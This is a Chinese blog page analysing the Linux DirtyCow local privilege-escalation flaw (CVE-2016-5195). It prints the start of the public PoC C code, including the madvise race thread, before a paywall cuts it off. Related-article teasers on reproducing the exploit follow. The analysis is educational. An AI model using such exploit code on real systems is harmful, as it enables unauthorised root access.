DirtyCow漏洞分析

最新推荐文章于 2025-03-05 16:20:00 发布
最新推荐文章于 2025-03-05 16:20:00 发布
阅读量907 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: LiveOverflow-binary hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_25899635/article/details/96771444
本文深入分析了Linux内核的 DirtyCow 漏洞(CVE-2016-5195),该漏洞允许本地低权限用户通过条件竞争,获取只读内存映射的写权限,从而提升到root权限。通过展示PoC代码,解释了如何利用madvise和mmap等函数触发这个权限提升漏洞,以及如何通过/proc/self/mem文件进行内存修改。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

.
  漏洞编号:CVE-2016-5195, 该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。 这是一个Linux kernel的本地权限提升漏洞。这里通过一个实验来逐步分析这个漏洞。
  先来看一段poc代码:
dirtycow.c

#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;
 
void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}
 
void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)
最低0.47元/天 解锁文章

200万优质内容无限畅学
Dirtycow脏牛(CVE-2016-5195)容器逃逸漏洞复现与分析
SHELLCODE_8BIT的博客
08-07 829
众所周知,操作系统为我们管理硬件资源,并以系统调用的方式对用户进程提供 API,但是 syscall 很慢,涉及陷入内核以及上下文切换。对于少量频繁调用的系统调用(比如获取当期系统时间)来说,是否可以某种安全的方式开放到用户空间,让用户直接访问而不需要经过 syscall 呢?vDSO 就是用来解决这个问题的。vDSO 全程为这个名词大家应该有所耳闻,就是 Linux 下的动态库的全称,而virtual表明,这个动态库是通过某种手段虚拟出来的,并不真正存在于 Linux 文件系统中。
漏洞复现】CVE-2016-5195 DirtyCow 脏牛提权
李火火的安全圈
03-10 8909
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围四、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
dirtycow提权漏洞原理图
03-10
自己画的关于脏牛漏洞提权的原理图,个人感觉比较清晰,适合小白理解用
Linux(CVE-2016-5195)Dirty cow漏洞利用提权
m0_73927535的博客
06-04 1151
1、虚拟机 环境2、下载后解压 ,虚拟机打开二、信息收集1、查看kali本机IP<192.168.209.152>,进行本网段扫描2、扫描到有一个IP<192.168.209.154>,这个就是同网段靶机的IP。3、 扫描端口,发现开放了三个端口4、访问1898端口,本机或kali访问都可以。
“脏牛(Dirty COW)”漏洞是什么
m0_57836225的博客
09-10 1133
1. 权限提升:允许普通用户获得 root 权限,这意味着攻击者可以完全控制受影响的系统,包括读取、修改和删除任何文件,安装恶意软件,窃取敏感信息等。1. 寻找可利用的目标:攻击者首先在目标系统中寻找可写的内存映射文件,一般会选择那些低权限用户可访问且可能被内核映射到内存中的文件。4. 权限提升:通过修改关键文件,攻击者可以实现权限提升,例如将自己的用户权限提升到 root 权限,从而完全控制目标系统。3. 最终,攻击者可以修改这个文件的内容,实现对系统关键文件的修改,从而获得更高的权限。
探索 Dirty COW:一个安全领域的传奇漏洞
gitblog_00044的博客
05-11 502
探索 Dirty COW:一个安全领域的传奇漏洞 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 在信息技术的世界中,安全始终是至关重要的议题。Dirty COW(亦称“脏牛”)是一个著名的历史性Linux内核漏洞,它揭示了内存管理中一个潜在的严重问题。这个项目不仅提供了一个学习和理解系统安全性的窗口,还鼓励社区成员参与互动,通过解答FAQ和挑战来深化对这一主题的理...
Dirty COW漏洞原理与简单利用
热门推荐
Ray的博客
05-20 1万+
我将分为3个部分进行介绍,包括:漏洞的概述,漏洞的成因以及漏洞的利用。 首先是漏洞概述: Dirty COW漏洞是一种发生在写时复制的竞态条件漏洞,它影响所有基于Linux的操作系统,包括Android,这个漏洞2007年起就存在于Linux内核中,直到2016年才被发现和修复。可以利用这个漏洞修改受保护的文件,也可以利用这个漏洞提权。 Dirty COW漏洞是发生在写时复制的竞态条件漏洞,我们先看看什么是竞态条件和写时复制。 竞态条件是指一个系统或者进程的输出依赖于不受控制的事件出现顺序或者出现时
android系统中检测dirtycow(脏牛)漏洞的方法
潇湘淑女
03-22 2094
一、脏牛漏洞简介 Linux内核的内存子系统在处理copy-on-write(COW)时出现竞争条件,导致私有只读存储器映射被破坏,可利用此漏洞非法获得读写权限,进而提升权限。 android系统中的普通用户,若对root用户创建文件只有读权限,利用该漏洞,可以达到对文件进行写操作。这也是检测该漏洞的主要方法。 二、检测漏洞的源代码、编译 1.源代码 源代码在dirtycowtest.c
DirtyCow Linux权限提升漏洞分析(CVE-2016-5195)
trap0D的专栏
02-18 2115
概述这篇分析最早写在团队的BLOG里,在这里也贴一下(http://lab.xmirror.cn/)。DirtyCow漏洞是最近爆出的Linux内核本地权限提升漏洞。该漏洞容易触发利用简单稳定,影响多个系统算是一个不错的漏洞。而且漏洞已经存在多年
Kali Vulnhub-lampiao脏牛提权(dirtyCow漏洞复现
牛奶栗的小博客
09-27 5417
​vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249。 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式...
Linux核心再修补了安全漏洞 DirtyCOW修补不完全
自在过生活
12-05 806
尽管DirtyCOW已被修补一年,但资安业者Bindecy发现修补并不完全,第三方在未授权下可写入只读页面,影响应用程序表现,受影响版本包括Ubuntu、Fedora、SUSE等,Android及Red Hat则未受影响。 在Linux重大安全漏洞DirtyCOW(CVE-2016–5195)被修补的一年之后,资安业者Bindecy发现该修补程序并不完全,使得Linux核心的首席开
关于COW的问题
陈刚编程心得与知识集
02-12 970
copyonwrite这个写时复制的机制怎么才能绕过呢,我是在linux下,这方面是不是有关内核的啊?
宋宝华:谈一谈Linux写时拷贝(COW)的安全漏洞(1)
宋宝华
01-09 8492
COW技术,爆出了巨大的漏洞,让父子进程间可以向对方泄露写过的新数据,成为了Linux内核的惊天大瓜。
dirty cow 试验
vbaspdelphi的专栏
10-26 3226
dirty cow 解释 https://dirtycow.ninja/ 下面的链接里面有当前暴露出来的一些exploit利用工具 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs 手动测试了dirtyc0w.c和dirty_passwd_adjust_cow,没有效果 # 编译代码 gcc -pthread dirtyc0w.c -o
DirtyCow Linux权限提升漏洞分析
inquisiter
03-09 2153
DirtyCow Linux权限提升漏洞分析 如上图,这个漏洞的特点就是线程竞争导致可以读写的权限被扩大了。其实具体说可能有点绕,就是foll_write标志在row特性执行后去掉了,但是再次执行时却没有检查页表项的有效性,导致我们可以利用另一个线程清空页表。清空的页表由于没有了foll_write权限要求,再次被分配时就不执行row执行机制,导致原本不应该本写的地址拥有了写的权限。 ...
linux提权之dirtycow
qq_62370574的博客
01-20 1442
漏洞是一种影响Linux操作系统的本地特权升级漏洞,其全称为"Copy-On-Write"(写时复制)漏洞。这个漏洞在2016年被公开,并且影响了大量的Linux内核版本。Dirty COW漏洞的根本原因是在Linux在竞态条件下的机制的实现存在缺陷。Copy-On-Write是一种内存管理技术,它允许多个进程共享同一个物理内存页面的副本,直到其中一个进程尝试修改该页面时,系统才会复制出一个新的页面供修改进程使用。是多个并发操作或线程访问共享资源时可能出现的一种问题。
Docker逃逸--脏牛漏洞POC测试
07-25 1295
脏牛漏洞(CVE-2016-5195)与VDSO(虚拟动态共享对象) 一、漏洞描述 Dirty Cow(CVE-2016-5195)是Linux内核中的权限提升漏洞,源于Linux内核的内存子系统在处理写入时拷贝(copy-on-write, Cow)存在竞争条件(race condition),允许恶意用户提权获取其他只读内存映射的写访问权限。 竞争条件意为任务执行顺序异常,可能导致应...
linux常见的提权方法
Jingged的博客
08-11 1679
1.内核漏洞提权1.内核漏洞提权内核漏洞提权是一种常见的方式,攻击者通过利用操作系统内核中的漏洞来提升权限。以下是一个内核漏洞提权的示例:脏牛漏洞(Dirty Cow)是一个广为人知的内核漏洞,影响范围广泛。该漏洞可以让低权限用户在本地系统上提升为root用户。
脏牛(Dirty COW)漏洞学习
最新发布
m0_63753692的博客
03-05 1313
脏牛(Dirty COW,全称“Copy-On-Write”漏洞,CVE-2016-5195)是 Linux 内核中的一个严重漏洞。它允许普通用户通过竞争条件)在内核的 COW 机制下获得写入只读映射文件的权限,从而实现本地权限提升(Privilege Escalation)。脏牛漏洞是由于 Linux COW 机制中的竞争条件导致的。该漏洞利用 GUP 机制使攻击者能够修改只读映射的文件。主要的利用方式是mmapmadvise触发竞争。
Linux DirtyCOW漏洞深度解析与防范
资源摘要信息:"Linux DirtyCOW是一个安全漏洞,它存在于Linux系统的内存子系统中,漏洞编号为CVE-2016-5195。这个漏洞允许本地攻击者通过一种称为copy-on-write(COW)的技术提升权限,获得对系统的完全控制。COW是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值